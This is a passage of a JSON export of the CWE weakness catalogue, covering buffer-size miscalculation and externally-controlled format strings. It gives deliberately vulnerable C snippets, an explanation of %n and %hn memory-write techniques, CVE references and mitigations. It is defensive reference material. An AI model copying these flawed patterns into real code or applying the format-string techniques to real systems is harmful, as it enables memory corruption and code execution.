NULL;showWidgets(WidgetList);","xhtml:br":["","","","","","","","","",""],"xhtml:div":[{"#text":"ExitError(\\"Incorrect number of widgets requested!\\");","attr":{"@_style":"margin-left:10px;"}},{"#text":"WidgetList[i] = InitializeWidget();","attr":{"@_style":"margin-left:10px;"}}]}},"Body_Text":"However, this code contains an off-by-one calculation error (CWE-193). It allocates exactly enough space to contain the specified number of widgets, but it does not include the space for the NULL pointer. As a result, the allocated buffer is smaller than it is supposed to be (CWE-131). So if the user ever requests MAX_NUM_WIDGETS, there is an out-of-bounds write (CWE-787) when the NULL is assigned. Depending on the environment and compilation settings, this could cause memory corruption."},{"attr":{"@_Demonstrative_Example_ID":"DX-33"},"Intro_Text":"The following image processing code allocates a table for images.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"img_t table_ptr; /*struct containing img data, 10kB each*/int num_imgs;...num_imgs = get_num_imgs();table_ptr = (img_t*)malloc(sizeof(img_t)*num_imgs);...","xhtml:br":["","","","",""]}},"Body_Text":"This code intends to allocate a table of size num_imgs, however as num_imgs grows large, the calculation determining the size of the list will eventually overflow (CWE-190). This will result in a very small list to be allocated instead. If the subsequent code operates on the list as if it were num_imgs long, it may result in many types of out-of-bounds problems (CWE-119)."},{"attr":{"@_Demonstrative_Example_ID":"DX-19"},"Intro_Text":"This example applies an encoding procedure to an input string and stores it into a buffer.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char * copy_input(char *user_supplied_string){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int i, dst_index;char *dst_buf = (char*)malloc(4*sizeof(char) * MAX_SIZE);if ( MAX_SIZE &lt;= strlen(user_supplied_string) ){}dst_index = 0;for ( i = 0; i &lt; strlen(user_supplied_string); i++ ){}return dst_buf;","xhtml:br":["","","","",""],"xhtml:div":[{"#text":"die(\\"user string too long, die evil hacker!\\");","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if( \'&amp;\' == user_supplied_string[i] ){}else if (\'&lt;\' == user_supplied_string[i] ){}else dst_buf[dst_index++] = user_supplied_string[i];","xhtml:div":[{"#text":"dst_buf[dst_index++] = \'&amp;\';dst_buf[dst_index++] = \'a\';dst_buf[dst_index++] = \'m\';dst_buf[dst_index++] = \'p\';dst_buf[dst_index++] = \';\';","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""]},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["",""],"xhtml:i":"/* encode to &amp;lt; */"}}],"xhtml:br":["",""]}}]}}}},"Body_Text":"The programmer attempts to encode the ampersand character in the user-controlled string, however the length of the string is validated before the encoding procedure is applied. Furthermore, the programmer assumes encoding expansion will only expand a given character by a factor of 4, while the encoding of the ampersand expands by 5. As a result, when the encoding procedure expands the string it is possible to overflow the destination buffer if the attacker provides a string of many ampersands."},{"attr":{"@_Demonstrative_Example_ID":"DX-21"},"Intro_Text":"The following code is intended to read an incoming packet from a socket and extract one or more headers.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"DataPacket *packet;int numHeaders;PacketHeader *headers;sock=AcceptSocketConnection();ReadPacket(packet, sock);numHeaders =packet-&gt;headers;if (numHeaders &gt; 100) {}headers = malloc(numHeaders * sizeof(PacketHeader);ParsePacketHeaders(packet, headers);","xhtml:br":["","","","","","","","","",""],"xhtml:div":{"#text":"ExitError(\\"too many headers!\\");","attr":{"@_style":"margin-left:10px;"}}}},"Body_Text":"The code performs a check to make sure that the packet does not contain too many headers. However, numHeaders is defined as a signed int, so it could be negative. If the incoming packet specifies a value such as -3, then the malloc calculation will generate a negative number (say, -300 if each header can be a maximum of 100 bytes). When this result is provided to malloc(), it is first converted to a size_t type. This conversion then produces a large value such as 4294966996, which may cause malloc() to fail or to allocate an extremely large amount of memory (CWE-195). With the appropriate negative numbers, an attacker could trick malloc() into using a very small positive number, which then allocates a buffer that is much smaller than expected, potentially leading to a buffer overflow."},{"Intro_Text":"The following code attempts to save three different identification numbers into an array. The array is allocated from memory using a call to malloc().","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int *id_sequence;id_sequence = (int*) malloc(3);if (id_sequence == NULL) exit(1);id_sequence[0] = 13579;id_sequence[1] = 24680;id_sequence[2] = 97531;","xhtml:br":["","","","","","","","","","","","",""],"xhtml:i":["/* Allocate space for an array of three ids. */","/* Populate the id array. */"]}},"Body_Text":["The problem with the code above is the value of the size parameter used during the malloc() call. It uses a value of \'3\' which by definition results in a buffer of three bytes to be created. However the intention was to create a buffer that holds three ints, and in C, each int requires 4 bytes worth of memory, so an array of 12 bytes is needed, 4 bytes for each int. Executing the above code could result in a buffer overflow as 12 bytes of data is being saved into 3 bytes worth of allocated space. The overflow would occur during the assignment of id_sequence[0] and would continue with the assignment of id_sequence[1] and id_sequence[2].","The malloc() call could have used \'3*sizeof(int)\' as the value for the size parameter in order to allocate the correct amount of space required to store the three ints."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2004-1363","Description":"substitution overflow: buffer overflow using environment variables that are expanded after the length check is performed","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1363"},{"Reference":"CVE-2004-0747","Description":"substitution overflow: buffer overflow using expansion of environment variables","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0747"},{"Reference":"CVE-2005-2103","Description":"substitution overflow: buffer overflow using a large number of substitution strings","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2103"},{"Reference":"CVE-2005-3120","Description":"transformation overflow: product adds extra escape characters to incoming data, but does not account for them in the buffer length","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3120"},{"Reference":"CVE-2003-0899","Description":"transformation overflow: buffer overflow when expanding \\"&gt;\\" to \\"&amp;gt;\\", etc.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0899"},{"Reference":"CVE-2001-0334","Description":"expansion overflow: buffer overflow using wildcards","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0334"},{"Reference":"CVE-2001-0248","Description":"expansion overflow: long pathname + glob = overflow","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0248"},{"Reference":"CVE-2001-0249","Description":"expansion overflow: long pathname + glob = overflow","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0249"},{"Reference":"CVE-2002-0184","Description":"special characters in argument are not properly expanded","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0184"},{"Reference":"CVE-2004-0434","Description":"small length value leads to heap overflow","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0434"},{"Reference":"CVE-2002-1347","Description":"multiple variants","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1347"},{"Reference":"CVE-2005-0490","Description":"needs closer investigation, but probably expansion-based","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0490"},{"Reference":"CVE-2004-0940","Description":"needs closer investigation, but probably expansion-based","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0940"},{"Reference":"CVE-2008-0599","Description":"Chain: Language interpreter calculates wrong buffer size (CWE-131) by using \\"size = ptr ? X : Y\\" instead of \\"size = (ptr ? X : Y)\\" expression.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0599"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Other length calculation error"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT30-C","Entry_Name":"Ensure that unsigned integer operations do not wrap","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MEM35-C","Entry_Name":"Allocate sufficient memory for an object","Mapping_Fit":"CWE More Abstract"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"100"}},{"attr":{"@_CAPEC_ID":"47"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-106"}},{"attr":{"@_External_Reference_ID":"REF-107"}},{"attr":{"@_External_Reference_ID":"REF-58"}},{"attr":{"@_External_Reference_ID":"REF-61"}},{"attr":{"@_External_Reference_ID":"REF-60"}},{"attr":{"@_External_Reference_ID":"REF-76"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 20, &#34;Integer Overflows&#34; Page 620"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 5: Buffer Overruns.&#34; Page 89"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 8, &#34;Incrementing Pointers Incorrectly&#34;, Page 401"}},{"attr":{"@_External_Reference_ID":"REF-64"}}]},"Notes":{"Note":[{"attr":{"@_Type":"Maintenance"},"xhtml:p":["This is a broad category. Some examples include:","This level of detail is rarely available in public reports, so it is difficult to find good examples."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ol":{"xhtml:li":["simple math errors,","incorrectly updating parallel counters,","not accounting for size differences when \\"transforming\\" one input to another format (e.g. URL canonicalization or other transformation that can generate a result that\'s larger than the original input, i.e. \\"expansion\\")."]}}},{"attr":{"@_Type":"Maintenance"},"xhtml:p":["This weakness may be a composite or a chain. It also may contain layering or perspective differences.","This issue may be associated with many different types of incorrect calculations (CWE-682), although the integer overflow (CWE-190) is probably the most prevalent. This can be primary to resource consumption problems (CWE-400), including uncontrolled memory allocation (CWE-789). However, its relationship with out-of-bounds buffer access (CWE-119) must also be considered."]}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Maintenance_Notes, Relationships, Taxonomy_Mappings, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Demonstrative_Examples, Likelihood_of_Exploit, Observed_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Detection_Factors, Maintenance_Notes, Potential_Mitigations, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Detection_Factors, Potential_Mitigations, References, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Common_Consequences, Detection_Factors, Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Maintenance_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Likelihood_of_Exploit, References, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Other Length Calculation Error","attr":{"@_Date":"2008-01-30"}}}},"132":{"attr":{"@_ID":"132","@_Name":"DEPRECATED: Miscalculated Null Termination","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Deprecated"},"Description":"This entry has been deprecated because it was a duplicate of CWE-170. All content has been transferred to CWE-170.","Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-07-19","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Common_Consequences, Description, Likelihood_of_Exploit, Name, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Name"}],"Previous_Entry_Name":[{"#text":"Miscalculated Null Termination","attr":{"@_Date":"2008-09-09"}},{"#text":"DEPRECATED (Duplicate): Miscalculated Null Termination","attr":{"@_Date":"2021-07-20"}}]}},"134":{"attr":{"@_ID":"134","@_Name":"Use of Externally-Controlled Format String","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software uses a function that accepts a format string as an argument, but the format string originates from an external source.","Extended_Description":{"xhtml:p":["When an attacker can modify an externally-controlled format string, this can lead to buffer overflows, denial of service, or data representation problems.","It should be noted that in some circumstances, such as internationalization, the set of format strings is externally controlled by design. If the source of these format strings is trusted (e.g. only contained in library files that are only modifiable by the system administrator), then the external control might not itself pose a vulnerability."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"123","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"700","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Often"}},{"attr":{"@_Name":"C++","@_Prevalence":"Often"}},{"attr":{"@_Name":"Perl","@_Prevalence":"Rarely"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation","Note":"The programmer rarely intends for a format string to be externally-controlled at all. This weakness is frequently introduced in code that constructs log messages, where a constant format string is omitted."},{"Phase":"Implementation","Note":"In cases such as localization and internationalization, the language-specific message repositories could be an avenue for exploitation, but the format string issue would be resultant, since attacker control of those repositories would also allow modification of message length, format, and content."}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Memory","Note":"Format string problems allow for information disclosure which can severely simplify exploitation of the program."},{"Scope":["Integrity","Confidentiality","Availability"],"Impact":["Modify Memory","Execute Unauthorized Code or Commands"],"Note":"Format string problems can result in the execution of arbitrary code."}]},"Detection_Methods":{"Detection_Method":[{"attr":{"@_Detection_Method_ID":"DM-1"},"Method":"Automated Static Analysis","Description":"This weakness can often be detected using automated static analysis tools. Many modern tools use data flow analysis or constraint-based techniques to minimize the number of false positives."},{"Method":"Black Box","Description":"Since format strings often occur in rarely-occurring erroneous conditions (e.g. for error message logging), they can be difficult to detect using black box methods. It is highly likely that many latent issues exist in executables that do not have associated source code (or equivalent source.","Effectiveness":"Limited"},{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Bytecode Weakness Analysis - including disassembler + source code weakness analysis","Binary Weakness Analysis - including disassembler + source code weakness analysis"]}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode simple extractor - strings, ELF readers, etc."}}]}},"Effectiveness":"High"},{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode disassembler - then use manual analysis for vulnerabilities &amp; anomalies"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Automated Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Web Application Scanner","Web Services Scanner","Database Scanners"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Fuzz Tester","Framework-based Fuzzer"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Manual Source Code Review (not inspections)"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Focused Manual Spotcheck - Focused manual analysis of source"}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Warning Flags"}}]}},"Effectiveness":"High"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Formal Methods / Correct-By-Construction"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Requirements","Description":"Choose a language that is not subject to this flaw."},{"Phase":"Implementation","Description":"Ensure that all format string functions are passed a static string which cannot be controlled by the user, and that the proper number of arguments are always sent to that function as well. If at all possible, use functions that do not support the %n operator in format strings. [REF-116] [REF-117]"},{"Phase":"Build and Compilation","Description":"Run compilers and linkers with high warning levels, since they may detect incorrect usage."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following program prints a string provided as an argument.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#include &lt;stdio.h&gt;void printWrapper(char *string) {}int main(int argc, char **argv) {}","xhtml:br":["","","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"printf(string);","xhtml:br":""}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"char buf[5012];memcpy(buf, argv[1], 5012);printWrapper(argv[1]);return (0);","xhtml:br":["","","",""]}}]}},"Body_Text":"The example is exploitable, because of the call to printf() in the printWrapper() function. Note: The stack buffer was added to make exploitation more simple."},{"Intro_Text":"The following code copies a command line argument into a buffer using snprintf().","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int main(int argc, char **argv){}","xhtml:div":{"#text":"char buf[128];...snprintf(buf,128,argv[1]);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}},"Body_Text":"This code allows an attacker to view the contents of the stack and write to the stack using a command line argument containing a sequence of formatting directives. The attacker can read from the stack by providing more formatting directives, such as %x, than the function takes as arguments to be formatted. (In this example, the function takes no arguments to be formatted.) By using the %n formatting directive, the attacker can write to the stack, causing snprintf() to write the number of bytes output thus far to the specified argument (rather than reading a value from the argument, which is the intended behavior). A sophisticated version of this attack will use four staggered writes to completely control the value of a pointer on the stack."},{"Intro_Text":"Certain implementations make more advanced attacks even easier by providing format directives that control the location in memory to read from or write to. An example of these directives is shown in the following code, written for glibc:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":"printf(\\"%d %d %1$d %1$d\\\\n\\", 5, 9);"},"Body_Text":"This code produces the following output: 5 9 5 5 It is also possible to use half-writes (%hn) to accurately control arbitrary DWORDS in memory, which greatly reduces the complexity needed to execute an attack that would otherwise require four staggered writes, such as the one mentioned in the first example."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-1825","Description":"format string in Perl program","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1825"},{"Reference":"CVE-2001-0717","Description":"format string in bad call to syslog function","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0717"},{"Reference":"CVE-2002-0573","Description":"format string in bad call to syslog function","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0573"},{"Reference":"CVE-2002-1788","Description":"format strings in NNTP server responses","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1788"},{"Reference":"CVE-2006-2480","Description":"Format string vulnerability exploited by triggering errors or warnings, as demonstrated via format string specifiers in a .bmp filename.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2480"},{"Reference":"CVE-2007-2027","Description":"Chain: untrusted search path enabling resultant format string by loading malicious internationalization messages","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2027"}]},"Functional_Areas":{"Functional_Area":["Logging","Error Handling","String Processing"]},"Affected_Resources":{"Affected_Resource":"Memory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Format string vulnerability"},{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Format String"},{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Format string problem"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO30-C","Entry_Name":"Exclude user input from format strings","Mapping_Fit":"Exact"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO47-C","Entry_Name":"Use valid format strings","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A1","Entry_Name":"Unvalidated Input","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":6,"Entry_Name":"Format String"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"IDS06-J","Entry_Name":"Exclude user input from format strings"},{"attr":{"@_Taxonomy_Name":"SEI CERT Perl Coding Standard"},"Entry_ID":"IDS30-PL","Entry_Name":"Exclude user input from format strings","Mapping_Fit":"Exact"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"},{"attr":{"@_Taxonomy_Name":"OMG ASCSM"},"Entry_ID":"ASCSM-CWE-134"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"135"}},{"attr":{"@_CAPEC_ID":"67"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-116"}},{"attr":{"@_External_Reference_ID":"REF-117"}},{"attr":{"@_External_Reference_ID":"REF-118"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 5, &#34;Format String Bugs&#34; Page 147"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 6: Format String Problems.&#34; Page 109"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 8, &#34;C Format Strings&#34;, Page 422"}},{"attr":{"@_External_Reference_ID":"REF-962","@_Section":"ASCSM-CWE-134"}}]},"Notes":{"Note":[{"attr":{"@_Type":"Applicable Platform"},"xhtml:p":"This weakness is possible in any programming language that support format strings."},{"attr":{"@_Type":"Other"},"xhtml:p":["While Format String vulnerabilities typically fall under the Buffer Overflow category, technically they are not overflowed buffers. The Format String vulnerability is fairly new (circa 1999) and stems from the fact that there is no realistic way for a function that takes a variable number of arguments to determine just how many arguments were passed in. The most common functions that take a variable number of arguments, including C-runtime functions, are the printf() family of calls. The Format String problem appears in a number of ways. A *printf() call without a format specifier is dangerous and can be exploited. For example, printf(input); is exploitable, while printf(y, input); is not exploitable in that context. The result of the first call, used incorrectly, allows for an attacker to be able to peek at stack memory since the input string will be used as the format specifier. The attacker can stuff the input string with format specifiers and begin reading stack values, since the remaining parameters will be pulled from the stack. Worst case, this improper use may give away enough control to allow an arbitrary value (or values in the case of an exploit program) to be written into the memory of the running program.","Frequently targeted entities are file names, process names, identifiers.","Format string problems are a classic C/C++ issue that are now rare due to the ease of discovery. One main reason format string vulnerabilities can be exploited is due to the %n operator. The %n operator will write the number of characters, which have been printed by the format string therefore far, to the memory pointed to by its argument. Through skilled creation of a format string, a malicious user may use values on the stack to create a write-what-where condition. Once this is achieved, they can execute arbitrary code. Other operators can be used as well; for example, a %9999s operator could also trigger a buffer overflow, or when used in file-formatting functions like fprintf, it can generate a much larger output than intended."]},{"#text":"Format string issues are under-studied for languages other than C. Memory or disk consumption, control flow or variable alteration, and data corruption may result from format string exploitation in applications written in other languages such as Perl, PHP, Python, etc.","attr":{"@_Type":"Research Gap"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Organization":"KDM Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Detection_Factors, Modes_of_Introduction, Relationships, Other_Notes, Research_Gaps, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"KDM Analytics","Modification_Date":"2009-07-17","Modification_Comment":"Improved the White_Box_Definition"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated White_Box_Definitions"},{"Modification_Name":"CWE Content 